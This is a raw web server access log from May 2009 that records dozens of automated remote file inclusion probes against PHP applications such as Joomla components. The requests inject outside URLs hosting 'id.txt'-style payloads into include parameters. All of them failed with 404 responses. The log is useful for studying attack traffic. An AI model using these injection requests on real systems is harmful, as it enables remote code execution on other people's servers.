62.140.23.192 - - [25/May/2009:22:37:11 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:11 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:22 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:45 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:45 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:49 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:50 -0500] "GET /logs/access_log.1240790400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:57 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:38:07 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:22:38:38 -0500] "GET //start.php?pag=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:22:38:38 -0500] "GET /logs//start.php?pag=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:22:38:38 -0500] "GET /logs/access_log.1240444800//start.php?pag=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:22:38:44 -0500] "GET /logs/access_log.1239580800//start.php?pag=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:22:40:57 -0500] "GET //start.php?pag=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:22:40:57 -0500] "GET /logs//start.php?pag=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:22:40:58 -0500] "GET /logs/access_log.1240444800//start.php?pag=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:22:41:02 -0500] "GET /logs/access_log.1239580800//start.php?pag=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.54.98 - - [25/May/2009:22:42:57 -0500] "GET /logs/access_log.1239148800//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon@nsmsystem.no-ip.info/gid.txt%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:43:19 -0500] "GET /logs/access_log.1239148800//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
66.175.122.228 - - [25/May/2009:22:45:29 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:45:29 -0500] "GET /logs/access_log.1237507200//index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:45:29 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:46:37 -0500] "GET /logs/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:46:37 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:46:42 -0500] "GET /errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:22:51:24 -0500] "GET //redaxo/include//addons.inc.php?REX[INCLUDE_PATH]=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.240.12.4 - - [25/May/2009:22:51:24 -0500] "GET /logs//redaxo/include//addons.inc.php?REX[INCLUDE_PATH]=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
124.0.54.98 - - [25/May/2009:22:57:19 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
65.55.106.107 - - [25/May/2009:22:58:48 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
86.39.131.85 - - [25/May/2009:23:00:37 -0500] "GET /logs/access_log.1242432000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
86.39.131.85 - - [25/May/2009:23:00:37 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
86.39.131.85 - - [25/May/2009:23:00:38 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
86.39.131.85 - - [25/May/2009:23:00:42 -0500] "GET /logs/access_log.1242000000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:23:02:30 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:23:02:30 -0500] "GET /logs/access_log.1240012800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:23:02:30 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
78.40.224.155 - - [25/May/2009:23:07:12 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:23:07:12 -0500] "GET /logs/access_log.1238457600//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:23:07:13 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.147.29.190 - - [25/May/2009:23:08:14 -0500] "GET //errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.147.29.190 - - [25/May/2009:23:08:14 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.147.29.190 - - [25/May/2009:23:08:14 -0500] "GET /logs//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.147.29.190 - - [25/May/2009:23:08:14 -0500] "GET /logs/access_log.1227139200//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:23:08:28 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:23:08:28 -0500] "GET /logs/access_log.1238457600//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:23:08:28 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.147.29.190 - - [25/May/2009:23:08:46 -0500] "GET /logs/access_log.1229212800//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.147.29.190 - - [25/May/2009:23:08:46 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:09:27 -0500] "GET /logs//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:09:27 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:09:27 -0500] "GET //errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:09:27 -0500] "GET /logs/access_log.1229212800//errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.55.171.90 - - [25/May/2009:23:11:25 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.55.171.90 - - [25/May/2009:23:11:25 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
80.55.171.90 - - [25/May/2009:23:11:25 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
80.55.171.90 - - [25/May/2009:23:12:02 -0500] "GET /logs/access_log.1242432000//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:23:15:30 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
210.240.12.4 - - [25/May/2009:23:15:30 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
70.90.108.169 - - [25/May/2009:23:15:45 -0500] "GET /logs//admin/create_vote_tables.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
70.90.108.169 - - [25/May/2009:23:15:45 -0500] "GET //admin/create_vote_tables.php?site_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET /logs/access_log.1242432000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET /logs/access_log.1242432000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:15:55 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
119.63.193.56 - - [25/May/2009:23:16:29 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
87.106.7.58 - - [25/May/2009:23:16:54 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:55 -0500] "GET /logs/access_log.1242000000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:55 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:55 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:59 -0500] "GET /logs/access_log.1242000000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:59 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:59 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:23:16:59 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:45 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:45 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:45 -0500] "GET /logs/access_log.1242000000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:45 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:59 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:59 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:59 -0500] "GET /logs/access_log.1242000000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:23:17:59 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [25/May/2009:23:19:09 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [25/May/2009:23:19:28 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [25/May/2009:23:19:28 -0500] "GET /logs/access_log.1238457600//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.24.49.35 - - [25/May/2009:23:19:31 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [25/May/2009:23:19:31 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [25/May/2009:23:19:32 -0500] "GET /logs/access_log.1238457600//components/com_simpleboard/image_upload.php?sbp=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:23:20:40 -0500] "GET /logs/access_log.1242000000//com_joomlaflashfun/admin.joomlaflashfun.php?=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:23:20:41 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:23:20:41 -0500] "GET /logs/access_log.1242086400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.173.130.41 - - [25/May/2009:23:20:45 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
76.12.124.76 - - [25/May/2009:23:21:01 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
76.12.124.76 - - [25/May/2009:23:21:02 -0500] "GET //include/mail.inc.php?skin_board_path=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
66.175.122.228 - - [25/May/2009:23:21:48 -0500] "GET /errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:23:21:48 -0500] "GET /logs/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:23:21:48 -0500] "GET /logs/access_log.1238889600/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
193.243.139.4 - - [25/May/2009:23:22:36 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
193.243.139.4 - - [25/May/2009:23:22:36 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
190.248.10.179 - - [25/May/2009:23:24:09 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
190.248.10.179 - - [25/May/2009:23:24:09 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
190.248.10.179 - - [25/May/2009:23:24:09 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.250.85.200 - - [25/May/2009:23:26:23 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.250.85.200 - - [25/May/2009:23:26:23 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
61.250.85.200 - - [25/May/2009:23:26:23 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.250.85.200 - - [25/May/2009:23:27:07 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:23:27:42 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
210.240.12.4 - - [25/May/2009:23:27:42 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
190.248.10.179 - - [25/May/2009:23:27:47 -0500] "GET /logs/access_log.1242172800//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.106.121 - - [25/May/2009:23:27:49 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.44.232.81 - - [25/May/2009:23:34:12 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:34:12 -0500] "GET //config/dbutil.bck.php?confdir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 305 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:34:12 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.44.232.81 - - [25/May/2009:23:34:16 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.106.187 - - [25/May/2009:23:36:49 -0500] "GET /logs/access_log.1132876800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.116.34.106 - - [25/May/2009:23:37:16 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:17 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:18 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:18 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:30 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:32 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
